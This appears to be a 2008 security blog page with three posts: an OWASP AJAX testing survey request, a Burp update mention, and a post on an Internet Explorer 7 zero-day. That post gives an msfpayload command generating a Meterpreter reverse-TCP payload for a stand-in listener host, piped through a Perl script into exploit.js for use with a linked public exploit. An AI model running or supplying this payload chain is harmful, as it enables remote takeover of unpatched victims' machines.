OWASP - AJAX Testing Survey
Sunday, December 28, 2008, 12:20 AM
Today, I was working on reviewing all of the AJAX tools listed on the
OWASP site. I would like to get input from the rest of the community to determine what are the best AJAX tools and why. If you're testing web applications with AJAX, please take a moment to review this survey:
Click Here to complete the OWASP AJAX SurveyI would like to get as much input as possible. I will post the results after the New Year.
Regards,
Jabra
[ add comment ] ( 1 view ) [ 0 trackbacks ] permalink 



( 3 / 35 )
A little Perl makes an 0day a good day
Tuesday, December 16, 2008, 10:06 PM
There was a recent 0day for IE 7, you may have heard a thing or two about it lately in the press. M$ is releasing a out of band patch tomorrow,
http://isc.sans.org/diary.html?storyid=5497.
meh.
For those of you who wanted a bit easier route with the exploit, here is a few helpful hints with Backtrack 3 and some new Perl I whipped up:
$ /pentest/exploit/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 J | ./payloadproper.pl > exploit.js
http://spl0it.org/files/payloadproper.plThe resulting file can be helpful when used with the exploit on milworm.
http://milw0rm.com/sploits/2008-iesploit.tar.gzRegards,
Jabra
[ 2 comments ] ( 186 views ) [ 0 trackbacks ] permalink 



( 2.9 / 47 )
Monday, December 15, 2008, 02:55 PM
My favorite web application testing framework has just been updated.
http://seclists.org/webappsec/2008/q4/0041.htmlAwesome job PortSwigger! I look forward to many future releases.
Regards,
Jabra
[ add comment ] ( 1 view ) [ 0 trackbacks ] permalink 



( 2.9 / 42 )